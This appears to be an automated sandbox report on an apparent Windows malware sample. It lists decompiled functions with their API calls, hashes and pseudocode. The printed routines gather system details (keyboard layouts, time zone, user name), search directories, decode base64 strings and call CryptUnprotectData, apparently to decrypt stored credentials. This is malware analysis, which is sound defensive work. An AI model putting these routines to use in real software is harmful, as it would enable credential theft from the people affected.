%s\*.*, xrefs: 00409B4D

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\*.*
API String ID: 180737720-1013718255
Opcode ID: 17cff671c5b088ba29cd1f939e027977487a5fc66f9f8793f0469572126c6735
Instruction ID: 40ddeea6463e79618606ce93b98e9b87413dcbde514457397972783d08c0d7b9
Opcode Fuzzy Hash: 17cff671c5b088ba29cd1f939e027977487a5fc66f9f8793f0469572126c6735
Instruction Fuzzy Hash: F4618DB2900108ABC714EFA4DC85EDB73BCBF48700F0485A9F60993151DB75EA94CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 02D212E0, Relevance: 19.6, APIs: 13, Instructions: 95fileCOMMON

Download Yara Rule

APIs

SetCurrentDirectoryA.KERNEL32(?), ref: 02D212ED
wsprintfA.USER32 ref: 02D21307
FindFirstFileA.KERNEL32(?,?), ref: 02D2131E
StrCmpCA.SHLWAPI(?,00414010), ref: 02D21344
StrCmpCA.SHLWAPI(?,00414014), ref: 02D2135A
FindNextFileA.KERNEL32(000000FF,?), ref: 02D21423
FindClose.KERNEL32(000000FF), ref: 02D21438

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: Find$File$CloseCurrentDirectoryFirstNextwsprintf
String ID:
API String ID: 2809309208-0
Opcode ID: 4258f23d34cf02f08480d43e87c0d7bfbbd2779a6ab049ced438d9f47dbadb74
Instruction ID: 1d6d16e71e214a5ef5e2f343c5690d02f28cc6e3c91ee0c62af0d04bffc8c840
Opcode Fuzzy Hash: 4258f23d34cf02f08480d43e87c0d7bfbbd2779a6ab049ced438d9f47dbadb74
Instruction Fuzzy Hash: 503182B2900218ABCB10DFA0DD88EEA73BCBF48705F00C699B209A2150DB74DB98CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0040AE00, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AE00() {
				void* _v8;
				void _v524;
				int _v528;
				int _v532;
				void* _v536;
				signed int _v540;
				void* _t63;

				_v536 = RtlAllocateHeap(GetProcessHeap(), 0, 0x1f4);
				_v528 = 0;
				_v8 = 0;
				_v532 = GetKeyboardLayoutList(0, 0);
				_v8 = LocalAlloc(0x40, _v532 << 2);
				_v532 = GetKeyboardLayoutList(_v532, _v8);
				_v540 = 0;
				while(_v540 < _v532) {
					GetLocaleInfoA( *(_v8 + _v540 * 4) & 0x0000ffff, 2,  &_v524, 0x200);
					if(_v528 == 0) {
						wsprintfA(_v536, 0x414024,  &_v524);
						_t63 = _t63 + 0xc;
					} else {
						wsprintfA(_v536, "%s / %s", _v536,  &_v524);
						_t63 = _t63 + 0x10;
					}
					_v528 = _v528 + 1;
					memset( &_v524, 0, 0x200);
					_v540 = _v540 + 1;
				}
				if(_v8 != 0) {
					LocalFree(_v8);
				}
				return _v536;
			}

0x0040ae1d
0x0040ae23
0x0040ae2d
0x0040ae3e
0x0040ae56
0x0040ae6a
0x0040ae70
0x0040ae8b
0x0040aeb9
0x0040aec6
0x0040af00
0x0040af06
0x0040aec8
0x0040aee2
0x0040aee8
0x0040aee8
0x0040af12
0x0040af26
0x0040ae85
0x0040ae85
0x0040af35
0x0040af3b
0x0040af3b
0x0040af4a

APIs

GetProcessHeap.KERNEL32(00000000,000001F4), ref: 0040AE10
RtlAllocateHeap.NTDLL(00000000), ref: 0040AE17
GetKeyboardLayoutList.USER32(00000000,00000000), ref: 0040AE38
LocalAlloc.KERNEL32(00000040,?), ref: 0040AE50
GetKeyboardLayoutList.USER32(?,00000000), ref: 0040AE64
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0040AEB9
wsprintfA.USER32 ref: 0040AEE2
wsprintfA.USER32 ref: 0040AF00
memset.NTDLL ref: 0040AF26
LocalFree.KERNEL32(00000000), ref: 0040AF3B

Strings

%s / %s, xrefs: 0040AED6

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: HeapKeyboardLayoutListLocalwsprintf$AllocAllocateFreeInfoLocaleProcessmemset
String ID: %s / %s
API String ID: 1833916909-2910687431
Opcode ID: 0f92bf5acf608854974982b1739cf72243a6d7f18833e1a36854ea9882f8a1ec
Instruction ID: eeb2f0a0621c424ab69100cade097cc135afe8712b6e6ced773cd8003e1ddd0d
Opcode Fuzzy Hash: 0f92bf5acf608854974982b1739cf72243a6d7f18833e1a36854ea9882f8a1ec
Instruction Fuzzy Hash: 48317CB098121CEBDB60DB54CD8DBE9B7B4FB54300F1086E5E509A6291C7745ED0CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 02D29D90, Relevance: 18.2, APIs: 12, Instructions: 183fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 02D29DA9
FindFirstFileA.KERNEL32(?,?), ref: 02D29DC0
StrCmpCA.SHLWAPI(?,00414010), ref: 02D29DE6
StrCmpCA.SHLWAPI(?,00414014), ref: 02D29DFC
FindNextFileA.KERNEL32(000000FF,?), ref: 02D29FE8
FindClose.KERNEL32(000000FF), ref: 02D29FFD

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID:
API String ID: 180737720-0
Opcode ID: 4dc38651a575e3339a7912356295249081a0a3c24a7ffebe6d2d4ad050319dcf
Instruction ID: ab38e0cf127228586f03a4df8a13c009ebf1eec3cc3c010485eea42bbf627631
Opcode Fuzzy Hash: 4dc38651a575e3339a7912356295249081a0a3c24a7ffebe6d2d4ad050319dcf
Instruction Fuzzy Hash: D16178B2900118ABCB14EFA4DC84EDB73BDEF58704F048599F60992150EB75EA98CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02D29930, Relevance: 16.7, APIs: 11, Instructions: 213fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 02D29949
FindFirstFileA.KERNEL32(?,?), ref: 02D29960
StrCmpCA.SHLWAPI(?,00414010), ref: 02D29986
StrCmpCA.SHLWAPI(?,00414014), ref: 02D2999C
FindNextFileA.KERNEL32(000000FF,?), ref: 02D29B9A
FindClose.KERNEL32(000000FF), ref: 02D29BAF

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID:
API String ID: 180737720-0
Opcode ID: 5368e8b786ea03139a50106a3f224b7a5846eb6f2b8c7c17a6f5a730a81b7aca
Instruction ID: ac63afae5e74ade1b9d80ecf535f4c4522910a3365883875e578356f1a4319fe
Opcode Fuzzy Hash: 5368e8b786ea03139a50106a3f224b7a5846eb6f2b8c7c17a6f5a730a81b7aca
Instruction Fuzzy Hash: 898120B2500219ABCB14DF98DC94EEB73BDBF9C704F148589BA0993250E734EA54CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02D2B050, Relevance: 15.1, APIs: 10, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000001F4), ref: 02D2B060
RtlAllocateHeap.NTDLL(00000000), ref: 02D2B067
GetKeyboardLayoutList.USER32(00000000,00000000), ref: 02D2B088
LocalAlloc.KERNEL32(00000040,?), ref: 02D2B0A0
GetKeyboardLayoutList.USER32(?,00000000), ref: 02D2B0B4
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 02D2B109
wsprintfA.USER32 ref: 02D2B132
wsprintfA.USER32 ref: 02D2B150
memset.NTDLL ref: 02D2B176
LocalFree.KERNEL32(00000000), ref: 02D2B18B

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: HeapKeyboardLayoutListLocalwsprintf$AllocAllocateFreeInfoLocaleProcessmemset
String ID:
API String ID: 1833916909-0
Opcode ID: 0f92bf5acf608854974982b1739cf72243a6d7f18833e1a36854ea9882f8a1ec
Instruction ID: 2dd72c24c46fe12a1cdb8c330cd5441b42dfbae847a30e26ded08079ad28cb35
Opcode Fuzzy Hash: 0f92bf5acf608854974982b1739cf72243a6d7f18833e1a36854ea9882f8a1ec
Instruction Fuzzy Hash: D43189B0A8122CEBDB20DB94CD8DBE9B3B4FB54304F1082D5E519A2291CBB45ED0CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00407470, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
encryptionmemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407470(void* __ecx, char* _a4, void** _a8, char _a12) {
				int _v8;

				_v8 = 0;
				 *_a8 = 0;
				_t3 =  &_a12; // 0x407726
				 *( *_t3) = 0;
				_t4 =  &_a12; // 0x407726
				if(CryptStringToBinaryA(_a4, 0, 1, 0,  *_t4, 0, 0) != 0) {
					_t6 =  &_a12; // 0x407726
					 *_a8 = LocalAlloc(0x40,  *( *_t6));
					if( *_a8 != 0) {
						_t9 =  &_a12; // 0x407726
						_v8 = CryptStringToBinaryA(_a4, 0, 1,  *_a8,  *_t9, 0, 0);
						if(_v8 == 0) {
							 *_a8 = LocalFree( *_a8);
						}
					}
				}
				return _v8;
			}

0x00407474
0x0040747e
0x00407484
0x00407487
0x00407491
0x004074a7
0x004074a9
0x004074ba
0x004074c2
0x004074c8
0x004074e0
0x004074e7
0x004074f8
0x004074f8
0x004074e7
0x004074c2
0x00407500

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,&w@,00000000,00000000), ref: 0040749F
LocalAlloc.KERNEL32(00000040,?,?,00407726,?,?), ref: 004074B1
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,&w@,00000000,00000000), ref: 004074DA
LocalFree.KERNEL32(?,?,?,00407726,?,?), ref: 004074EF

Strings

&w@, xrefs: 00407484, 00407491, 004074A9, 004074C8, 00407494, 004074CB

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID: &w@
API String ID: 4291131564-3575860705
Opcode ID: 08b659a240ee31d0f212fcd460449a7e6ac96e7e70d3894c24358685cfddc9bf
Instruction ID: c39f37767852ac2ecb8cc561512dd45ccdd2e68df360e397a827ac1b88331437
Opcode Fuzzy Hash: 08b659a240ee31d0f212fcd460449a7e6ac96e7e70d3894c24358685cfddc9bf
Instruction Fuzzy Hash: 7011C0B4641208AFEB00CF64CC95FAA77B5FB89710F20C459F9199B3D0C7B5A940CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD40, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32
memorytimeCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040AD40() {
				struct _TIME_ZONE_INFORMATION _v180;
				void* _v184;
				long _v188;

				_v184 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				_v188 = GetTimeZoneInformation( &_v180);
				if(_v188 != 0xffffffff) {
					asm("cdq");
					wsprintfA(_v184, "UTC%d",  ~(_v180.Bias) / 0x3c);
					return _v184;
				}
				return _v184;
			}

0x0040ad5d
0x0040ad70
0x0040ad7d
0x0040ad8f
0x0040ada4
0x00000000
0x0040adad
0x00000000

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040AD50
RtlAllocateHeap.NTDLL(00000000), ref: 0040AD57
GetTimeZoneInformation.KERNEL32(?), ref: 0040AD6A
wsprintfA.USER32 ref: 0040ADA4

Strings

UTC%d, xrefs: 0040AD98

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID: UTC%d
API String ID: 3317088062-2723047788
Opcode ID: c1eaeb3e9eb05cc2c06cb84a2f343100f25f8727c1150393eb784ecd10d2e60d
Instruction ID: 6bb383849dc0d2738afe04011fc8d00bcf8755a75da2bcdf9aea4dbc95a6d17c
Opcode Fuzzy Hash: c1eaeb3e9eb05cc2c06cb84a2f343100f25f8727c1150393eb784ecd10d2e60d
Instruction Fuzzy Hash: D9F0F670904318DBDB209BA0DD49BE5737AAF04301F0041E1EA09A3291C7745E90CF47

Uniqueness

Uniqueness Score: -1.00%

Function 02D279F0, Relevance: 7.6, APIs: 5, Instructions: 90stringencryptionCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(02D2956D,00000001,?,00001FA0,00000000,00000000,?,00001FA0), ref: 02D27A3B
CryptStringToBinaryA.CRYPT32(02D2956D,00000000), ref: 02D27A46
lstrcat.KERNEL32(?,0041401A), ref: 02D27B09
lstrcat.KERNEL32(?,0041401A), ref: 02D27B1D
lstrcat.KERNEL32(0041401A,0041401A), ref: 02D27B3E

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: lstrcat$BinaryCryptStringlstrlen
String ID:
API String ID: 189259977-0
Opcode ID: 22087c711f4338eb39b615c0f377d7a38918ef4b0fdc1615a81ca521fe69a690
Instruction ID: 334c211337055c81d870d55442836dfb94982d2e82f0bc2732710566b5604ab4
Opcode Fuzzy Hash: 22087c711f4338eb39b615c0f377d7a38918ef4b0fdc1615a81ca521fe69a690
Instruction Fuzzy Hash: 6C415EB4A0421A9FDB10DF94CD89BFEF7B8EF48704F1085A9E505A7280C7749A94CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 004077A0, Relevance: 7.6, APIs: 5, Instructions: 90stringencryptionCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(0040931D,00000001,?,00001FA0,00000000,00000000,?,00001FA0), ref: 004077EB
CryptStringToBinaryA.CRYPT32(0040931D,00000000), ref: 004077F6
lstrcat.KERNEL32(?,0041401A), ref: 004078B9
lstrcat.KERNEL32(?,0041401A), ref: 004078CD
lstrcat.KERNEL32(0041401A,0041401A), ref: 004078EE

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: lstrcat$BinaryCryptStringlstrlen
String ID:
API String ID: 189259977-0
Opcode ID: 516e6448358f7b58bb84e67d9d16b3023418a82e33a7becf366805c1b7c308d2
Instruction ID: 30f07ec64d583e05a1b33d7b848fe3cd5425e9d6c421b14f2a106d9c5e4e8dd0
Opcode Fuzzy Hash: 516e6448358f7b58bb84e67d9d16b3023418a82e33a7becf366805c1b7c308d2
Instruction Fuzzy Hash: 42414075D042199BDB10DF90CD89BFEB7B8EF48744F1085BAE505A7280C7786A84CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 00404830, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00404830(void* __ecx, void* __eflags, char* _a4) {
				int _v8;
				void _v20011;
				char _v20012;

				E004139B0(0x4e28, __ecx);
				_v20012 = 0;
				memset( &_v20011, 0, 0x4e1f);
				_v8 = 0;
				CryptStringToBinaryA(_a4, E0040B740( &_v8, _a4), 1, 0,  &_v8, 0, 0);
				if(CryptStringToBinaryA(_a4, E0040B740( &_v8, _a4), 1,  &_v20012,  &_v8, 0, 0) == 0) {
					return 0x418b78;
				}
				return  &_v20012;
			}

0x00404838
0x0040483d
0x00404852
0x0040485a
0x0040487e
0x004048ae
0x00000000
0x004048ba
0x00000000

APIs

memset.MSVCRT ref: 00404852
CryptStringToBinaryA.CRYPT32(00000000,00000000,00000000,02E32480), ref: 0040487E
CryptStringToBinaryA.CRYPT32(00000000,00000000,00000000,00000000,00000000), ref: 004048A6

Strings

UNK, xrefs: 004048BA

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: BinaryCryptString$memset
String ID: UNK
API String ID: 1505698593-448974810
Opcode ID: 0302c2f55f6a7eb287019bb5278503ac1340180e62eed3cb738e234bc2e133be
Instruction ID: 67e6f1f926e8c7a0577fe417f9255aed609f7f29732bbe38cca2ef159a93475b
Opcode Fuzzy Hash: 0302c2f55f6a7eb287019bb5278503ac1340180e62eed3cb738e234bc2e133be
Instruction Fuzzy Hash: 150180F6A50208BAE710EA90CC46FDA736CAB44705F104569B704AB2C1DBF5AB8487AD

Uniqueness

Uniqueness Score: -1.00%

Function 02D276C0, Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,02D27976,00000000,00000000), ref: 02D276EF
LocalAlloc.KERNEL32(00000040,?,?,02D27976,?,?), ref: 02D27701
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,02D27976,00000000,00000000), ref: 02D2772A
LocalFree.KERNEL32(?,?,?,02D27976,?,?), ref: 02D2773F

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: 08b659a240ee31d0f212fcd460449a7e6ac96e7e70d3894c24358685cfddc9bf
Instruction ID: ca62bd5310a7620999fa3e1c81b29fb1b9100708869884b47c73366096399571
Opcode Fuzzy Hash: 08b659a240ee31d0f212fcd460449a7e6ac96e7e70d3894c24358685cfddc9bf
Instruction Fuzzy Hash: 0911D2B4241308AFEB10CF64CC95FAA77B5FB89714F208458F9159B3D0C7B1A940CB54

Uniqueness

Uniqueness Score: -1.00%

Function 02D24A80, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49encryptionCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000000), ref: 02D24ACE
CryptStringToBinaryA.CRYPT32(?,00000000,00000000,00000000), ref: 02D24AF6

Strings

UNK, xrefs: 02D24B0A

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: BinaryCryptString
String ID: UNK
API String ID: 80407269-448974810
Opcode ID: 6933eaff934019462525ac9f63904068db082611bb120be6f3861f78d51b7ebf
Instruction ID: 344342ee94481760176c79f1ae5e1839d4b0123588356f629922320479e6d37c
Opcode Fuzzy Hash: 6933eaff934019462525ac9f63904068db082611bb120be6f3861f78d51b7ebf
Instruction Fuzzy Hash: D30196F6A4020877D710EB90CC46FDA337CAB14704F004194F705AA2C1D6F4EA84CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 02D27760, Relevance: 4.5, APIs: 3, Instructions: 49memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 02D27784
LocalAlloc.KERNEL32(00000040,00000000), ref: 02D277A3
LocalFree.KERNEL32(?), ref: 02D277CF

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: b90efae16c500797bef48a79db51a3ce8e169ba8c9442b9772ed69811b9c1519
Instruction ID: ed860ae633d19da953cd4dd4907fe1b92ea280888499284f19bf1964fa51b75a
Opcode Fuzzy Hash: b90efae16c500797bef48a79db51a3ce8e169ba8c9442b9772ed69811b9c1519
Instruction Fuzzy Hash: 1A11A5B8A01209EFDB04DF94C984AAEB7B5FF88304F108559E915A7390D770AE51CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00407510, Relevance: 4.5, APIs: 3, Instructions: 49
memoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00407510(intOrPtr _a4, char _a8, intOrPtr* _a12, long* _a16) {
				void* _v8;
				long _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;

				_v16 = _a4;
				_v20 = _a8;
				_v24 =  *0x41a91c( &_v20, 0, 0, 0, 0, 0,  &_v12);
				if(_v24 != 0) {
					 *_a16 = _v12;
					 *_a12 = LocalAlloc(0x40,  *_a16);
					if( *_a12 != 0) {
						E0040B6C0( *_a12, _v8,  *_a16);
					}
				}
				LocalFree(_v8);
				return _v24;
			}

0x00407519
0x0040751f
0x0040753a
0x00407541
0x00407549
0x0040755c
0x00407564
0x00407576
0x00407576
0x00407564
0x0040757f
0x0040758b

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00407534
LocalAlloc.KERNEL32(00000040,00000000), ref: 00407553
LocalFree.KERNEL32(?), ref: 0040757F

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: b90efae16c500797bef48a79db51a3ce8e169ba8c9442b9772ed69811b9c1519
Instruction ID: 5588d120a004665a6ba361d23f784ce6a241c8210f3f123560cfb33f0262ac2e
Opcode Fuzzy Hash: b90efae16c500797bef48a79db51a3ce8e169ba8c9442b9772ed69811b9c1519
Instruction Fuzzy Hash: A711BAB4A01209EFCB04DF94D984EEE77B5FF88300F108569E915A7390D734AE51CB65

Uniqueness

Uniqueness Score: -1.00%

Function 02D26CF0, Relevance: 4.5, APIs: 3, Instructions: 19sleepCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 02D26CF6
Sleep.KERNEL32(00002710), ref: 02D26D04
GetTickCount.KERNEL32 ref: 02D26D0A

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: CountTick$Sleep
String ID:
API String ID: 4250438611-0
Opcode ID: 7f553c1e48c696f60989e1e45f98f64c256f88cb05cd9abfc45eb1fdc696742f
Instruction ID: 024927918e784e2712ba57e8884c1c56728a7725898ede6e44422ecc9599c4b3
Opcode Fuzzy Hash: 7f553c1e48c696f60989e1e45f98f64c256f88cb05cd9abfc45eb1fdc696742f
Instruction Fuzzy Hash: 08E04F3094920CDBC700AFB4ED080AC7BB4EB00346F1084B1980592240DA348968CA97

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACA0, Relevance: 4.5, APIs: 3, Instructions: 19
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ACA0() {
				long _v8;
				void* _v12;

				_v12 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				_v8 = 0x104;
				GetUserNameA(_v12,  &_v8);
				return _v12;
			}

0x0040acba
0x0040acbd
0x0040accc
0x0040acd8

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00406B14,JohnDoe,?,00406B8D), ref: 0040ACAD
RtlAllocateHeap.NTDLL(00000000,?,00406B8D), ref: 0040ACB4
GetUserNameA.ADVAPI32(?,00000104), ref: 0040ACCC

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: Heap$AllocateNameProcessUser
String ID:
API String ID: 1296208442-0
Opcode ID: e9dc6b98a5dfea62f6889e6a1ef584fcd877daf0bb91c9162e28492c9d990377
Instruction ID: d8f7b171ebd5a715f3e42bd651ca7b29b46524e3321307990960babfdc207423
Opcode Fuzzy Hash: e9dc6b98a5dfea62f6889e6a1ef584fcd877daf0bb91c9162e28492c9d990377
Instruction Fuzzy Hash: 68E08CB4901208BBCB00EFE4DE49ACDBBB8AB08302F0040A4EA04E3280D6755A94CB52

Uniqueness

Uniqueness Score: -1.00%

Function 02D273E0, Relevance: 1.6, APIs: 1, Instructions: 60encryptionCOMMON

Download Yara Rule

APIs

Part of subcall function 02D2B8F0: GetProcessHeap.KERNEL32(00000008,02D33662,?,02D2B7ED,02D33662,00000009,?,02D33662,00000009), ref: 02D2B8F9
Part of subcall function 02D2B8F0: RtlAllocateHeap.NTDLL(00000000,?,02D2B7ED), ref: 02D2B900

CryptUnprotectData.CRYPT32(00000003,00000000,00000000,00000000,00000000,00000000,?), ref: 02D27433

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: Heap$AllocateCryptDataProcessUnprotect
String ID:
API String ID: 976466151-0
Opcode ID: eb6f61757d666350bd732e34e11297bcafa1fe30373c176f0f3feb6d61718744
Instruction ID: 9735a0fb90746c8cd07e65e437bf3de9f1900e08de82e496fafa9f68672dcc5e
Opcode Fuzzy Hash: eb6f61757d666350bd732e34e11297bcafa1fe30373c176f0f3feb6d61718744
Instruction Fuzzy Hash: F4110AB5E00209DFDF04DFA9C881AAEFBB5EF58308F148155E955AB300D634AA45CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00407190, Relevance: 1.6, APIs: 1, Instructions: 60
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E00407190(intOrPtr _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;

				_v8 = E0040B6A0(_a8);
				E0040B6C0(_v8, _a4, _a8);
				_v12 = _a4;
				_v16 = _a8;
				_v28 = E0040B6A0(_a8);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v16);
				if( *0x41a91c() == 0) {
					return 0;
				}
				_v32 = 0;
				while(_v32 < _v24) {
					 *((char*)(_v28 + _v32)) =  *((intOrPtr*)(_v20 + _v32));
					_v32 = _v32 + 1;
				}
				 *((char*)(_v28 + _v24)) = 0;
				return _v28;
			}

0x004071a2
0x004071b1
0x004071b9
0x004071bf
0x004071ce
0x004071d4
0x004071d5
0x004071d7
0x004071d9
0x004071db
0x004071dd
0x004071e2
0x004071eb
0x00000000
0x00407229
0x004071ed
0x004071ff
0x00407215
0x004071fc
0x004071fc
0x0040721f
0x00000000

APIs

Part of subcall function 0040B6A0: GetProcessHeap.KERNEL32(00000008,00413650,?,0040B59D,00413650,?,?,00413650,00004098), ref: 0040B6A9
Part of subcall function 0040B6A0: RtlAllocateHeap.NTDLL(00000000,?,0040B59D), ref: 0040B6B0

CryptUnprotectData.CRYPT32(00000003,00000000,00000000,00000000,00000000,00000000,?), ref: 004071E3

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: Heap$AllocateCryptDataProcessUnprotect
String ID:
API String ID: 976466151-0
Opcode ID: eb6f61757d666350bd732e34e11297bcafa1fe30373c176f0f3feb6d61718744
Instruction ID: 8f8f6216897be9d8972c86f868d54cc82cdb6c08760e6d1e730d1f8a7c76b19d
Opcode Fuzzy Hash: eb6f61757d666350bd732e34e11297bcafa1fe30373c176f0f3feb6d61718744
Instruction Fuzzy Hash: 17116DB5D04109EBCF00CFD8D881AAFB7B4AF44304F108569E905AB341D338AA41CF9A

Uniqueness

Uniqueness Score: -1.00%

